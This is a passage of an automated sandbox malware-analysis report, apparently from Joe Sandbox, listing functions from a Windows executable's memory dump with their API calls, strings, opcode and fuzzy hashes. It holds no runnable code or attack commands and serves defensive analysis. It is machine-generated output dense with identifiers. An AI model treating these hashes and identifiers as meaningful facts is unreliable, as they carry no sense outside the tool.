                                                                                  • API ID: ClientRect$ScreenWindow$IconItemLoadMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1742658178-0
                                                                                  • Opcode ID: 822196f13f8cb656c8d958955199ce723ffb2dbe1cc3409ef171392ef32f8350
                                                                                  • Instruction ID: b69804b3791e15353625e259f97d47b02a376f96a7b1cc483fdcb2e99f951efc
                                                                                  • Opcode Fuzzy Hash: 822196f13f8cb656c8d958955199ce723ffb2dbe1cc3409ef171392ef32f8350
                                                                                  • Instruction Fuzzy Hash: FF01B575200B04BFE720AF75DC85F5AB7A8EF44344F01442EF1458A1A2CB65AD058B59
                                                                                  Function 004D44BA Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsFree.KERNEL32(00000000,?,?,004D49C7,00000000,00000001), ref: 004D44C6
                                                                                  • GlobalHandle.KERNEL32(006E4400), ref: 004D44EE
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004D44F7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004D44FE
                                                                                  • RtlDeleteCriticalSection.NTDLL(005265A4), ref: 004D4508
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 2159622880-0
                                                                                  • Opcode ID: cb6da8d783fc6681e8d8de56225f6df150f11cbab41be80f81569ff4ee8617ff
                                                                                  • Instruction ID: 63e9dbe670a203257b058ace1d018806896b9d500556565e34a7c755de825dfa
                                                                                  • Opcode Fuzzy Hash: cb6da8d783fc6681e8d8de56225f6df150f11cbab41be80f81569ff4ee8617ff
                                                                                  • Instruction Fuzzy Hash: 23F054356002105BC6209B68AD58A2B77ADAFD5760B1A062AF805D7352DB78DC058A68
                                                                                  Function 004452D1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004452D6
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologIncrementInterlocked
                                                                                  • String ID: 0'Q$StatusDlg$\...\
                                                                                  • API String ID: 1487423697-1728948752
                                                                                  • Opcode ID: 3365586afe07882afe7f20066f5c5256555181784de92731ea33be375af51204
                                                                                  • Instruction ID: f22cf3fbf42c11e433b2a3728b14dab16d921bcebbd3324ed7603805772d584f
                                                                                  • Opcode Fuzzy Hash: 3365586afe07882afe7f20066f5c5256555181784de92731ea33be375af51204
                                                                                  • Instruction Fuzzy Hash: 80E1827580164CEEDB04EBA5C945FEEBBB8AF14318F10815EF411A3282DB78AB48C775
                                                                                  Function 00434327 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 249sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043432C
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 004343CF
                                                                                  • Sleep.KERNEL32(000003E8,?,?,00523A30,00000000), ref: 00434582
                                                                                    • Part of subcall function 00405829: __EH_prolog.LIBCMT ref: 0040582E
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlockedSleep__ftollstrlen
                                                                                  • String ID: M
                                                                                  • API String ID: 2235712041-2059362058
                                                                                  • Opcode ID: ecb8d47e500eefbf028a52efdbde302e8cbcef04fa6b3e4522e1921532059f44
                                                                                  • Instruction ID: 2609724d6b425b12864784c18ee052514be183a7909086b7665e80e96c9da8bd
                                                                                  • Opcode Fuzzy Hash: ecb8d47e500eefbf028a52efdbde302e8cbcef04fa6b3e4522e1921532059f44
                                                                                  • Instruction Fuzzy Hash: C181DF31D00218ABCB15EBA6C842BEFB778AF58714F14406FF501B62C1DF386A85CB69
                                                                                  Function 0045517E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 193windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00455183
                                                                                  • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0045535E
                                                                                    • Part of subcall function 004485FA: __EH_prolog.LIBCMT ref: 004485FF
                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 00455389
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologMessageSend
                                                                                  • String ID: PROGRESS
                                                                                  • API String ID: 2337391251-3828510218
                                                                                  • Opcode ID: 81bab92f1c02582255b22207a58f5daa3b14cfec1154b21085891c0c2b8c31a1
                                                                                  • Instruction ID: 2b1e397e12f03f4678023bdd541d38bf45dec0c0dcb937d34899a42104c94a24
                                                                                  • Opcode Fuzzy Hash: 81bab92f1c02582255b22207a58f5daa3b14cfec1154b21085891c0c2b8c31a1
                                                                                  • Instruction Fuzzy Hash: B0715D70600700AFDB24DF66C891F6E77E5AF48718F00445EF9469B7A2DBB8E945CB18
                                                                                  Function 004252CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004252D1
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 0042539F
                                                                                  • __ftol.LIBCMT ref: 004253C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked__ftol$DecrementIncrementlstrlen
                                                                                  • String ID: 0:R
                                                                                  • API String ID: 439246406-2078724643
                                                                                  • Opcode ID: 4ace22e6e435bd80082a95107f97f8161545f24012109938afbb2bf02e46854b
                                                                                  • Instruction ID: 88ad1fd7d60f6b63740e5e777cc857b1748f885b6aeae587901654c0060e3ac1
                                                                                  • Opcode Fuzzy Hash: 4ace22e6e435bd80082a95107f97f8161545f24012109938afbb2bf02e46854b
                                                                                  • Instruction Fuzzy Hash: 5C51DF35904619AADB08F7A5D856FEEBB789F11328F20001FF501762C2EF786B858769
                                                                                  Function 00438537 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 164COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043853C
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0041ED1A: __EH_prolog.LIBCMT ref: 0041ED1F
                                                                                  • __ftol.LIBCMT ref: 00438677
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftollstrlen
                                                                                  • String ID: find$string
                                                                                  • API String ID: 2052632373-714750175
                                                                                  • Opcode ID: 354f5ced3f16ac45f9bfe9f1d436d3e15d3d92f6b98a36ba76be0b5f9c1790d9
                                                                                  • Instruction ID: 25949ec09fe44b22c2e5c54f30dd98b0d3d22a1de5424eed0d04a7bee1fb0c66
                                                                                  • Opcode Fuzzy Hash: 354f5ced3f16ac45f9bfe9f1d436d3e15d3d92f6b98a36ba76be0b5f9c1790d9
                                                                                  • Instruction Fuzzy Hash: 5E41F43550562579DB05BB66DC43FEE76189F06368F200A0FF522761D2EF6C1B8282AE
                                                                                  Function 004380FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00438104
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 00438141
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol
                                                                                  • String ID: string$sub
                                                                                  • API String ID: 386204849-840957247
                                                                                  • Opcode ID: 6abd88f371b5804018c6640d17cc2162726079331c79b9a5e5c6cd8d70bb7097
                                                                                  • Instruction ID: 0a84d31eb87c2cf0dfbeca07404b8c80f64030a6b5c9cdc93c6df70cd9cab058
                                                                                  • Opcode Fuzzy Hash: 6abd88f371b5804018c6640d17cc2162726079331c79b9a5e5c6cd8d70bb7097
                                                                                  • Instruction Fuzzy Hash: 9C41263190591076CB05BB66DC06FDF76289F86368F24061FF011661D2DF7C174283AE
                                                                                  Function 00431246 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043124B
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00431274
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiGetProductPropertyA), ref: 004312B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AddressLibraryLoadProc__ftollstrlen
                                                                                  • String ID: MsiGetProductPropertyA
                                                                                  • API String ID: 2098034898-692162424
                                                                                  • Opcode ID: 171011ed97976af3af664d568f9993c89badeaec2a4550877276198d9c138332
                                                                                  • Instruction ID: 23c6238a69f59e3bd9027a36f1daa92b1bd34e0450f06b9ed8a7198d8bbd9adb
                                                                                  • Opcode Fuzzy Hash: 171011ed97976af3af664d568f9993c89badeaec2a4550877276198d9c138332
                                                                                  • Instruction Fuzzy Hash: 3331A275800219EADF04BFE2DC829EEBB38EF15344F10452FF502B6191DB784A818BA9
                                                                                  Function 004307EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004307F1
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 00430844
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiApplyPatchA), ref: 0043089B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AddressProc__ftollstrlen
                                                                                  • String ID: MsiApplyPatchA
                                                                                  • API String ID: 1060375874-3494550721
                                                                                  • Opcode ID: 430ddd6f83711d950128309da4ab1ff88125b4d333911fcf85fc06e9a8566a08
                                                                                  • Instruction ID: 3650b06de49e0371e24a52ee1b310ea6181d079255d05b88511ed11ebd425911
                                                                                  • Opcode Fuzzy Hash: 430ddd6f83711d950128309da4ab1ff88125b4d333911fcf85fc06e9a8566a08
                                                                                  • Instruction Fuzzy Hash: 3B31F436914214B9EB08F362EC16FDF27289F41328F14011FF501A61C2EF7C5B8182AD
                                                                                  Function 0042819E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004281A3
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • __ftol.LIBCMT ref: 00428226
                                                                                  • ShellExecuteA.SHELL32(00000000,explore,00000000,00000002,00000000,00523A30), ref: 0042826C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$DecrementExecuteIncrementShell__ftol
                                                                                  • String ID: explore
                                                                                  • API String ID: 3873431966-1223399770
                                                                                  • Opcode ID: bd00ea477b01b95d683aa43f1a2f224e03f1d6069c242f1992e59e042619e2af
                                                                                  • Instruction ID: abe5bc0a56f320496d7d89a062e45ca6eec03fae51079ef31fbbbf9bac991e33
                                                                                  • Opcode Fuzzy Hash: bd00ea477b01b95d683aa43f1a2f224e03f1d6069c242f1992e59e042619e2af
                                                                                  • Instruction Fuzzy Hash: 7E31A376905618BEDB04EBB6D846EEF7B68DF45314F10002FF401A2182EF786B858679
                                                                                  Function 00440905 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0044090A
                                                                                    • Part of subcall function 004194C8: __EH_prolog.LIBCMT ref: 004194CD
                                                                                    • Part of subcall function 004194C8: LoadLibraryExA.KERNEL32(WinINet.dll,00000000,00000002,00523A30), ref: 00419513
                                                                                    • Part of subcall function 004194C8: FormatMessageA.KERNEL32(00001300,00000000,00002EE0,00000400,?,00000000,00000000,00523A30), ref: 00419538
                                                                                    • Part of subcall function 004194C8: LocalFree.KERNEL32(?,?), ref: 00419550
                                                                                    • Part of subcall function 004194C8: FreeLibrary.KERNEL32(00000000), ref: 0041955B
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 00417FD8: __EH_prolog.LIBCMT ref: 00417FDD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$FreeLibrary$DecrementFormatInterlockedLoadLocalMessage
                                                                                  • String ID: Message$Number$Status
                                                                                  • API String ID: 1938834182-3482011399
                                                                                  • Opcode ID: 8811a978a070b76f05fee87e4f21c6044bbcea7103bf46db11927d13232daa9b
                                                                                  • Instruction ID: 9a994f7739760833678aee26aba1a019c7c7f41c86935ee0ce91a999a74bc4b2
                                                                                  • Opcode Fuzzy Hash: 8811a978a070b76f05fee87e4f21c6044bbcea7103bf46db11927d13232daa9b
                                                                                  • Instruction Fuzzy Hash: F521B031805528BACB01BBA6CC02FDE3A68AF52328F10059FF415714D2DF7C178687AE
                                                                                  Function 00424917 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 0042493C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
